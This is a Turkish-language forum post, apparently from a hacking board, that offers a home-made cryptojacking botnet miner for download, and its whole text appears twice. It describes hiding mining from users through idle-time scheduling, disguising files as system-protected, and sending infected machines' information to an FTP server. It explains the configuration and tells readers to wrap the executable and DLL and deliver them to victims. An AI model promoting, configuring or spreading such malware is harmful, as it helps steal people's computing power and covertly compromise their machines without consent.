Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın
Kendi yazdığım bot miner'ı sizinle paylaşmak istiyorum. Açık kaynak kodlu bir CPU miner'ı daemon olarak kullanıyorum. SHA-256 ve Scrypt algoritmaları ile kazabiliyor. Bir crypto pool hesabı açarak konfigürasyonu yaptıktan sonra zombi olacak kullanıcılara distrubutionı yaparak siz de kazmaya başlayabilirsiniz.
Özelliklerinden bahsetmek gerekirse:
- Kaç thread ile kazılacağına pc idle da veya değilken akıllıca karar verir.
- Fark edilmemek amacı ile yalnızca idle da veya her zaman ama belli aralıklar kazı yaptırılılabilir.
- Fark edilmemek için kernel32'daki SET_FILE_ATTRIBUTE ile dosyalarını "System Protected" olarak marklar.
- Hala zombi sistemde çalışıp çalışmadığını kontrol edebilmeniz için FTP üzerinden zombi sistem bilgisini içeren loglar yollar.
- Komutlar sadece daemon tarafından okunabilen pipe'lar kullanılarak executelanır.
Ayar açıklamaları:
- Pool adres = stratum+tcp://stratum.POOLADRESINIZ.com
ORT şeklinde olmalı. (Stratum zorunlu değil. Ben slushpool kullanıyorum tavsiye ederim.)
- Pool K. adı ve şifre = self explanatory
- FTP adres = başında ftp:// olmamalı files.ADRESİNİZ.com gibi. (000webhost kullanıyorum tavsiye ederim)
- FTP K. adı ve şifre = self explanatory
- Idle/Non-Idle'da restart süresi = PC idle(screen saver başladığında) durumda veya değil iken terminate edildikten sorna tekar başlatılacağı süre.
- Idle/Non-Idle'da terminate süresi = PC idle(screen saver başladığında) durumda veya değil iken terminate edilme süresi.
Bu seçeneğin amacı bilgisayar çalışırken belli aralıklarla miner'ı çalıştırarak kullanıcıya fark edilmemektir.
Örneğin: Non-Idle'da 30dk'da bir restarta ayarlayıp 15dk(900sn)'da bir terminate ettirebilirsiniz.
-
Özetle bu. Bir de exception handling ile pek uğraşmadığım için konfigüre ederken yanlış değeler girmeyin. FTP adresiniz şifreniz k. adı'nız hepsi doğru olsun. Integer girmeniz gereken yere string girmeyin. Program başlatılacağında hook.dll ile aynı konumda olsun. Yoksa çalışmaz.
Kullanım için yapmanız gereken wrapper ile exe ve dll'yi oluşturduktan sonra exe ve dll aynı konumda iken açacak şekilde kurbana ulaştırmanız.
virustotal: https://www.virustotal.com/gui/file/...c8e4/detection
indir: https://drive.google.com/open?id=1P-...B47a2icVgJ4rGf
*Çoğu anti-virüs tarafından miner olarak algılanabiliyor ama genel olarak safe.
*Developer fee olarak zombi sistemde kazılan sürenin 3/4 ünü size 1/4 ünü de benim pool hesabım için harcayacak.
Kendi yazdığım bot miner'ı sizinle paylaşmak istiyorum. Açık kaynak kodlu bir CPU miner'ı daemon olarak kullanıyorum. SHA-256 ve Scrypt algoritmaları ile kazabiliyor. Bir crypto pool hesabı açarak konfigürasyonu yaptıktan sonra zombi olacak kullanıcılara distrubutionı yaparak siz de kazmaya başlayabilirsiniz.
Özelliklerinden bahsetmek gerekirse:
- Kaç thread ile kazılacağına pc idle da veya değilken akıllıca karar verir.
- Fark edilmemek amacı ile yalnızca idle da veya her zaman ama belli aralıklar kazı yaptırılılabilir.
- Fark edilmemek için kernel32'daki SET_FILE_ATTRIBUTE ile dosyalarını "System Protected" olarak marklar.
- Hala zombi sistemde çalışıp çalışmadığını kontrol edebilmeniz için FTP üzerinden zombi sistem bilgisini içeren loglar yollar.
- Komutlar sadece daemon tarafından okunabilen pipe'lar kullanılarak executelanır.
Ayar açıklamaları:
- Pool adres = stratum+tcp://stratum.POOLADRESINIZ.com
ORT şeklinde olmalı. (Stratum zorunlu değil. Ben slushpool kullanıyorum tavsiye ederim.)- Pool K. adı ve şifre = self explanatory
- FTP adres = başında ftp:// olmamalı files.ADRESİNİZ.com gibi. (000webhost kullanıyorum tavsiye ederim)
- FTP K. adı ve şifre = self explanatory
- Idle/Non-Idle'da restart süresi = PC idle(screen saver başladığında) durumda veya değil iken terminate edildikten sorna tekar başlatılacağı süre.
- Idle/Non-Idle'da terminate süresi = PC idle(screen saver başladığında) durumda veya değil iken terminate edilme süresi.
Bu seçeneğin amacı bilgisayar çalışırken belli aralıklarla miner'ı çalıştırarak kullanıcıya fark edilmemektir.
Örneğin: Non-Idle'da 30dk'da bir restarta ayarlayıp 15dk(900sn)'da bir terminate ettirebilirsiniz.
-
Özetle bu. Bir de exception handling ile pek uğraşmadığım için konfigüre ederken yanlış değeler girmeyin. FTP adresiniz şifreniz k. adı'nız hepsi doğru olsun. Integer girmeniz gereken yere string girmeyin. Program başlatılacağında hook.dll ile aynı konumda olsun. Yoksa çalışmaz.
Kullanım için yapmanız gereken wrapper ile exe ve dll'yi oluşturduktan sonra exe ve dll aynı konumda iken açacak şekilde kurbana ulaştırmanız.
virustotal: https://www.virustotal.com/gui/file/...c8e4/detection
indir: https://drive.google.com/open?id=1P-...B47a2icVgJ4rGf
*Çoğu anti-virüs tarafından miner olarak algılanabiliyor ama genel olarak safe.
*Developer fee olarak zombi sistemde kazılan sürenin 3/4 ünü size 1/4 ünü de benim pool hesabım için harcayacak.
Last edited by a moderator:
